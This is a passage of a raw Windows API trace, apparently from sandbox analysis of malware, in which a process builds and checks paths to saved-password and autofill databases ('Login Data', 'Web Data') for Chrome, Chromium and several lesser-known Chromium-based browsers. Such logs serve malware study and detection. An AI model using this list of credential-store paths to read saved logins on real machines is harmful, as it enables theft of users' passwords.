0x620000 [0062.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x63c428 [0062.931] GetProcessHeap () returned 0x620000 [0062.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.932] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 0 [0062.932] GetProcessHeap () returned 0x620000 [0062.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0062.932] GetProcessHeap () returned 0x620000 [0062.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0062.933] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.933] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 67 [0062.933] GetProcessHeap () returned 0x620000 [0062.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a) returned 0x63c438 [0062.934] GetProcessHeap () returned 0x620000 [0062.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.936] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 0 [0062.936] GetProcessHeap () returned 0x620000 [0062.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0062.937] GetProcessHeap () returned 0x620000 [0062.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0062.937] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.938] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 87 [0062.938] GetProcessHeap () returned 0x620000 [0062.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb2) returned 0x63c450 [0062.938] GetProcessHeap () returned 0x620000 [0062.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.939] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 0 [0062.939] GetProcessHeap () returned 0x620000 [0062.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0062.940] GetProcessHeap () returned 0x620000 [0062.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0062.940] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.941] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 85 [0062.941] GetProcessHeap () returned 0x620000 [0062.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63c448 [0062.941] GetProcessHeap () returned 0x620000 [0062.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.942] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 0 [0062.942] GetProcessHeap () returned 0x620000 [0062.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0062.943] GetProcessHeap () returned 0x620000 [0062.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0062.943] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.944] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 68 [0062.944] GetProcessHeap () returned 0x620000 [0062.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c) returned 0x63c428 [0062.944] GetProcessHeap () returned 0x620000 [0062.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.945] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 0 [0062.945] GetProcessHeap () returned 0x620000 [0062.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0062.945] GetProcessHeap () returned 0x620000 [0062.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0062.946] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.946] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 76 [0062.946] GetProcessHeap () returned 0x620000 [0062.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9c) returned 0x62a938 [0062.946] GetProcessHeap () returned 0x620000 [0062.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.947] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 0 [0062.948] GetProcessHeap () returned 0x620000 [0062.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62a938 | out: hHeap=0x620000) returned 1 [0062.948] GetProcessHeap () returned 0x620000 [0062.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0062.949] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.950] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 78 [0062.950] GetProcessHeap () returned 0x620000 [0062.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x62a938 [0062.951] GetProcessHeap () returned 0x620000 [0062.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.952] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 0 [0062.952] GetProcessHeap () returned 0x620000 [0062.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62a938 | out: hHeap=0x620000) returned 1 [0062.953] GetProcessHeap () returned 0x620000 [0062.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0062.954] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.955] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 76 [0062.955] GetProcessHeap () returned 0x620000 [0062.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9c) returned 0x62af20 [0062.955] GetProcessHeap () returned 0x620000 [0062.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.956] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 0 [0062.956] GetProcessHeap () returned 0x620000 [0062.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62af20 | out: hHeap=0x620000) returned 1 [0062.957] GetProcessHeap () returned 0x620000 [0062.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0062.958] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.959] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 59 [0062.959] GetProcessHeap () returned 0x620000 [0062.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x63c428 [0062.959] GetProcessHeap () returned 0x620000 [0062.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.961] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 0 [0062.961] GetProcessHeap () returned 0x620000 [0062.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0062.961] GetProcessHeap () returned 0x620000 [0062.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0062.962] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.962] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 67 [0062.962] GetProcessHeap () returned 0x620000 [0062.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a) returned 0x63c438 [0062.963] GetProcessHeap () returned 0x620000 [0062.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.963] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.964] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 0 [0062.964] GetProcessHeap () returned 0x620000 [0062.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0062.964] GetProcessHeap () returned 0x620000 [0062.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0062.965] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.971] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 73 [0062.971] GetProcessHeap () returned 0x620000 [0062.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x96) returned 0x63c450 [0062.971] GetProcessHeap () returned 0x620000 [0062.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.972] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 0 [0062.972] GetProcessHeap () returned 0x620000 [0062.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0062.972] GetProcessHeap () returned 0x620000 [0062.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0062.973] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.974] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 71 [0062.974] GetProcessHeap () returned 0x620000 [0062.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x92) returned 0x63c448 [0062.974] GetProcessHeap () returned 0x620000 [0062.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.975] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 0 [0062.975] GetProcessHeap () returned 0x620000 [0062.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0062.975] GetProcessHeap () returned 0x620000 [0062.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0062.976] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.976] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 54 [0062.977] GetProcessHeap () returned 0x620000 [0062.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x63c428 [0062.977] GetProcessHeap () returned 0x620000 [0062.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.978] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 0 [0062.978] GetProcessHeap () returned 0x620000 [0062.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0062.978] GetProcessHeap () returned 0x620000 [0062.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0062.979] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.979] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 62 [0062.979] GetProcessHeap () returned 0x620000 [0062.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x63c438 [0062.979] GetProcessHeap () returned 0x620000 [0062.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.981] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 0 [0062.981] GetProcessHeap () returned 0x620000 [0062.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0062.981] GetProcessHeap () returned 0x620000 [0062.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0062.982] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.982] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 73 [0062.983] GetProcessHeap () returned 0x620000 [0062.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x96) returned 0x63c450 [0062.983] GetProcessHeap () returned 0x620000 [0062.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.984] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 0 [0062.984] GetProcessHeap () returned 0x620000 [0062.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0062.984] GetProcessHeap () returned 0x620000 [0062.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0062.985] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.986] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 71 [0062.986] GetProcessHeap () returned 0x620000 [0062.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x92) returned 0x63c448 [0062.986] GetProcessHeap () returned 0x620000 [0062.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.987] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 0 [0062.987] GetProcessHeap () returned 0x620000 [0062.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0062.989] GetProcessHeap () returned 0x620000 [0062.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0062.990] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.991] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 54 [0062.991] GetProcessHeap () returned 0x620000 [0062.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x63c428 [0062.991] GetProcessHeap () returned 0x620000 [0062.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.993] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 0 [0062.993] GetProcessHeap () returned 0x620000 [0062.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0062.993] GetProcessHeap () returned 0x620000 [0062.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0062.994] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.995] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 62 [0062.995] GetProcessHeap () returned 0x620000 [0062.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x63c438 [0062.995] GetProcessHeap () returned 0x620000 [0062.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0062.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0062.997] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 0 [0062.997] GetProcessHeap () returned 0x620000 [0062.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0062.998] GetProcessHeap () returned 0x620000 [0062.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0062.999] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0062.999] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 70 [0062.999] GetProcessHeap () returned 0x620000 [0063.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x63c450 [0063.000] GetProcessHeap () returned 0x620000 [0063.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.001] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 0 [0063.001] GetProcessHeap () returned 0x620000 [0063.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.001] GetProcessHeap () returned 0x620000 [0063.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.002] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.002] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 68 [0063.002] GetProcessHeap () returned 0x620000 [0063.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c) returned 0x63c448 [0063.002] GetProcessHeap () returned 0x620000 [0063.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.003] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 0 [0063.004] GetProcessHeap () returned 0x620000 [0063.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0063.004] GetProcessHeap () returned 0x620000 [0063.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.004] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.005] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 51 [0063.005] GetProcessHeap () returned 0x620000 [0063.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6a) returned 0x63c428 [0063.005] GetProcessHeap () returned 0x620000 [0063.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.006] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 0 [0063.006] GetProcessHeap () returned 0x620000 [0063.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.007] GetProcessHeap () returned 0x620000 [0063.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.007] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.008] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 59 [0063.008] GetProcessHeap () returned 0x620000 [0063.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x63c438 [0063.008] GetProcessHeap () returned 0x620000 [0063.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.009] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 0 [0063.009] GetProcessHeap () returned 0x620000 [0063.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.009] GetProcessHeap () returned 0x620000 [0063.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.010] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.010] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 73 [0063.011] GetProcessHeap () returned 0x620000 [0063.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x96) returned 0x63c450 [0063.011] GetProcessHeap () returned 0x620000 [0063.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.021] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 0 [0063.021] GetProcessHeap () returned 0x620000 [0063.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.022] GetProcessHeap () returned 0x620000 [0063.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.022] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.023] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 71 [0063.023] GetProcessHeap () returned 0x620000 [0063.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x92) returned 0x63c448 [0063.023] GetProcessHeap () returned 0x620000 [0063.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.024] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 0 [0063.024] GetProcessHeap () returned 0x620000 [0063.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0063.025] GetProcessHeap () returned 0x620000 [0063.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.025] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.026] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 54 [0063.026] GetProcessHeap () returned 0x620000 [0063.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x63c428 [0063.026] GetProcessHeap () returned 0x620000 [0063.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.027] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 0 [0063.028] GetProcessHeap () returned 0x620000 [0063.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.028] GetProcessHeap () returned 0x620000 [0063.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.028] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.029] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 62 [0063.029] GetProcessHeap () returned 0x620000 [0063.029] RtlAllocateHeap (HeapHandle=0x620000, 